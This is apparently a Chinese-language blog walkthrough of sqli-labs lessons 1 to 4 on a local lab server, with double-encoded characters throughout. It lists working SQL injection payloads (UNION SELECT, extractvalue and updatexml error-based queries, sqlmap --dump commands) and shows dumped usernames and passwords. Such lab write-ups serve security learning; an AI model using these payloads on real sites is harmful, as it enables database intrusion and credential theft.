Less-1----Less-4

Less-1

http://192.168.26.148/sql/Less-1/?id=1

\轉(zhuǎn)義字符,把后面第一個(gè)東西變成字符串

輸入\?

顯示near ''1\' LIMIT 0,1' at line 1

輸入'?

顯示near ''1'' LIMIT 0,1' at line 1

估算閉合方式為 '

驗(yàn)證閉合

id=2' --+? ? ? ? ? ? ? ? ? ? 頁(yè)面顯示正常為'閉合

-為注釋符

+為空格的意思

確定有多少欄目

id=2' order by 10 --+? ? ? 二分法估算

發(fā)現(xiàn) order by 3 不報(bào)錯(cuò) ,

order by 4報(bào)錯(cuò)? ? ? ? 說(shuō)明有3個(gè)欄目? ?

Unknown column '4' in 'order clause'

方法一:手工UNION聯(lián)合查詢注入

id = -2' union select 1,2,3 --+? ? ? ? ? ? -2故意出錯(cuò),顯示union執(zhí)行的操作

Welcome? ? Dhakkan

Your Login name:2

Your Password:3

看到顯示位為2和3位

查表名

一條一條查

id=-2' union select 1,table_name,3 from information_schema.tables where table_schema = 'security' limit 0,1? --+? ? ? 查第一個(gè)表

id=-2' union select 1,table_name,3 from information_schema.tables where table_schema = 'security' limit 0,2? --+? ? ? 查第二個(gè)表 以此類推

查詢所有的表名

id=--2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+

emais

referes

uagents

users

查列名

id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'? --+

id

username

password

查字段

id=-2' union select 1,group_concat(username),group_concat(password) from users? --+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

=============================================================================================

方法二:手工報(bào)錯(cuò)型注入

爆庫(kù)名

id=1'? and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

id=1'? and extractvalue(1,concat(0x7e,database(),0x7e))--+

或者

id=1'? and updatexml(1,concat(0x7e,database(),0x7e),1)--+

顯示

XPATH syntax error: '~security~'

爆表名

id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+

XPATH syntax error: '~emails,referers,uagents,users~'

爆列名

id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))--+

XPATH syntax error: '~id,username,password~'

爆字段

id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users),0x7e)) --+

顯示不出來(lái)的依次查下去

id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users where id not in (1)),0x7e)) --+

id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users where id not in (1,2)),0x7e)) --+

id=1' and extractvalue(1,concat(0x7e,(select group_concat(id,username,0x7e,password) from users where id not in (1,2,3)),0x7e)) --+

=============================================================================================

方法三:sqlmap工具自動(dòng)注入

爆庫(kù)名

sqlmap -u "http://192.168.26.148/sql/Less-1/?id=1" --current-db --batch

爆表名

Sqlmap? -u "http://192.168.26.148/sql/Less-1/?id=1" --batch -D security --tables

爆字段,爆值

Sqlmap? -u "http://192.168.26.148/sql/Less-1/?id=1" --batch -D security -T users --dump


2-4同上,只是閉合方式不同??

2是 數(shù)字型注入

Less-2

?id=2\?

near '\ LIMIT 0,1' at line 1

即什么都沒(méi)有? 數(shù)字型注入

order by判斷

例如

方法一:手工UNION聯(lián)合查詢注入

id=-2 union select 1,group_concat(username),group_concat(password) from users? --+

==============================================================================================================

方法二:手工報(bào)錯(cuò)型注入

id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

==============================================================================================================

方法三:sqlmap工具自動(dòng)注入

sqlmap -u "http://192.168.26.148/sql/Less-2/?id=1" --current-db --batch


==============================================================================================================

Less-3

id=2\?

near ''1\') LIMIT 0,1' at line 1

')? --+? ? ? ? 閉合

方法一:手工UNION聯(lián)合查詢注入

方法二:手工報(bào)錯(cuò)型注入

方法三:sqlmap工具自動(dòng)注入

==============================================================================================================

Less-4

\

near '"1\") LIMIT 0,1' at line 1

")?

方法一:手工UNION聯(lián)合查詢注入

方法二:手工報(bào)錯(cuò)型注入

方法三:sqlmap工具自動(dòng)注入

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,559評(píng)論 2 22
  • sqlmap用戶手冊(cè) 說(shuō)明:本文為轉(zhuǎn)載,對(duì)原文中一些明顯的拼寫(xiě)錯(cuò)誤進(jìn)行修正,并標(biāo)注對(duì)自己有用的信息。 ======...
    wind_飄閱讀 2,205評(píng)論 0 5
  • 一、分類 可以有以下幾種不同的維度:維度一:基于注入點(diǎn)值的屬性 數(shù)字型 字符型維度二:基于注入點(diǎn)的位置 GET/P...
    ffx_01閱讀 1,848評(píng)論 0 0
  • less-1 輸入單引號(hào)后報(bào)錯(cuò),根據(jù)報(bào)錯(cuò)信息,可以確定輸入?yún)?shù)的內(nèi)容被存放到一對(duì)單引號(hào)中間 爆表:用到語(yǔ)句:id=...
    lokisteven閱讀 3,256評(píng)論 0 4

友情鏈接更多精彩內(nèi)容